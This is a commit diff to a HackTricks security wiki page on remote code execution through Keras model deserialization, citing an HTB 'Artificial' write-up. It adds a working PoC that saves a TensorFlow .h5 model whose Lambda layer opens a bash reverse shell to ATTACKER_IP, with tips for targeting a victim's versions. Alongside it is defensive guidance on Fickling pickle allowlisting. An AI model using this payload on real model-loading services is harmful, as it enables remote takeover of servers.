Merge pull request #1520 from HackTricks-wiki/update_HTB_Artificial__TensorFlow__h5_model_RCE___Backres_20251025_182452

carlospolop · web-flow · commit 1690e151ec2e · 2025-11-07T09:13:16.000+01:00
HTB Artificial TensorFlow .h5 model RCE → Backrest creds lea...
diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
@@ -91,6 +91,39 @@ Security improvements (Keras ≥ 3.9):
 - Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
 - Basic type checking: deserialized objects must match expected types
 
+## Practical exploitation: TensorFlow-Keras HDF5 (.h5) Lambda RCE
+
+Many production stacks still accept legacy TensorFlow-Keras HDF5 model files (.h5). If an attacker can upload a model that the server later loads or runs inference on, a Lambda layer can execute arbitrary Python on load/build/predict.
+
+Minimal PoC to craft a malicious .h5 that executes a reverse shell when deserialized or used:
+
+```python
+import tensorflow as tf
+
+def exploit(x):
+    import os
+    os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'")
+    return x
+
+m = tf.keras.Sequential()
+m.add(tf.keras.layers.Input(shape=(64,)))
+m.add(tf.keras.layers.Lambda(exploit))
+m.compile()
+m.save("exploit.h5")  # legacy HDF5 container
+```
+
+Notes and reliability tips:
+- Trigger points: code may run multiple times (e.g., during layer build/first call, model.load_model, and predict/fit). Make payloads idempotent.
+- Version pinning: match the victim’s TF/Keras/Python to avoid serialization mismatches. For example, build artifacts under Python 3.8 with TensorFlow 2.13.1 if that’s what the target uses.
+- Quick environment replication:
+
+```dockerfile
+FROM python:3.8-slim
+RUN pip install tensorflow-cpu==2.13.1
+```
+
+- Validation: a benign payload like os.system("ping -c 1 YOUR_IP") helps confirm execution (e.g., observe ICMP with tcpdump) before switching to a reverse shell.
+
 ## Post-fix gadget surface inside allowlist
 
 Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
@@ -116,17 +149,63 @@ Gadget via Lambda that references an allowed function (not serialized Python byt
 Important limitation:
 - Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
 
-Potential impacts of allowlisted gadgets:
-- Arbitrary download/write (path planting, config poisoning)
-- Network callbacks/SSRF-like effects depending on environment
-- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
+## ML pickle import allowlisting for AI/ML models (Fickling)
+
+Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports.
+
+A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles.
+
+Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously:
+- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.)
+- Not get/set arbitrary attributes or items
+- Not import or obtain references to other Python objects from the pickle VM
+- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly
+
+Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked:
+
+```python
+import fickling
+# Sets global hooks on the stdlib pickle module
+fickling.hook.activate_safe_ml_environment()
+```
+
+Operational tips:
+- You can temporarily disable/re-enable the hooks where needed:
+
+```python
+fickling.hook.deactivate_safe_ml_environment()
+# ... load fully trusted files only ...
+fickling.hook.activate_safe_ml_environment()
+```
+
+- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols:
+
+```python
+fickling.hook.activate_safe_ml_environment(also_allow=[
+    "package.subpackage.safe_symbol",
+    "another.safe.import",
+])
+```
+
+- Fickling also exposes generic runtime guards if you prefer more granular control:
+  - fickling.always_check_safety() to enforce checks for all pickle.load()
+  - with fickling.check_safety(): for scoped enforcement
+  - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks
+
+- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist.
+
+This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos.
+
 
 ## Researcher toolkit
 
 1) Systematic gadget discovery in allowed modules
 
 Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
 
+<details>
+<summary>Enumerate potentially dangerous callables in allowlisted Keras modules</summary>
+
 ```python
 import importlib, inspect, pkgutil
 
@@ -170,6 +249,8 @@ for root in ALLOWLIST:
 print("\n".join(sorted(candidates)[:200]))
 ```
 
+</details>
+
 2) Direct deserialization testing (no .keras archive needed)
 
 Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
@@ -199,61 +280,6 @@ Keras exists in multiple codebases/eras with different guardrails and formats:
 
 Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
 
-## Defensive recommendations
-
-- Treat model files as untrusted input. Only load models from trusted sources.
-- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
-- Do not set safe_mode=False when loading models unless you fully trust the file.
-- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
-- Enforce allowlists/signatures for model sources and integrity checking where possible.
-
-## ML pickle import allowlisting for AI/ML models (Fickling)
-
-Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports.
-
-A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles.
-
-Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously:
-- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.)
-- Not get/set arbitrary attributes or items
-- Not import or obtain references to other Python objects from the pickle VM
-- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly
-
-Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked:
-
-```python
-import fickling
-# Sets global hooks on the stdlib pickle module
-fickling.hook.activate_safe_ml_environment()
-```
-
-Operational tips:
-- You can temporarily disable/re-enable the hooks where needed:
-
-```python
-fickling.hook.deactivate_safe_ml_environment()
-# ... load fully trusted files only ...
-fickling.hook.activate_safe_ml_environment()
-```
-
-- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols:
-
-```python
-fickling.hook.activate_safe_ml_environment(also_allow=[
-    "package.subpackage.safe_symbol",
-    "another.safe.import",
-])
-```
-
-- Fickling also exposes generic runtime guards if you prefer more granular control:
-  - fickling.always_check_safety() to enforce checks for all pickle.load()
-  - with fickling.check_safety(): for scoped enforcement
-  - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks
-
-- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist.
-
-This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos.
-
 ## References
 
 - [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
@@ -262,11 +288,12 @@ This allowlist-first strategy demonstrably blocks common ML pickle exploit paths
 - [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
 - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
 - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
+- [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html)
 - [Trail of Bits blog – Fickling’s new AI/ML pickle file scanner](https://blog.trailofbits.com/2025/09/16/ficklings-new-ai/ml-pickle-file-scanner/)
 - [Fickling – Securing AI/ML environments (README)](https://github.com/trailofbits/fickling#securing-aiml-environments)
 - [Fickling pickle scanning benchmark corpus](https://github.com/trailofbits/fickling/tree/master/pickle_scanning_benchmark)
 - [Picklescan](https://github.com/mmaitre314/picklescan), [ModelScan](https://github.com/protectai/modelscan), [model-unpickler](https://github.com/goeckslab/model-unpickler)
 - [Sleepy Pickle attacks background](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/)
 - [SafeTensors project](https://github.com/safetensors/safetensors)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}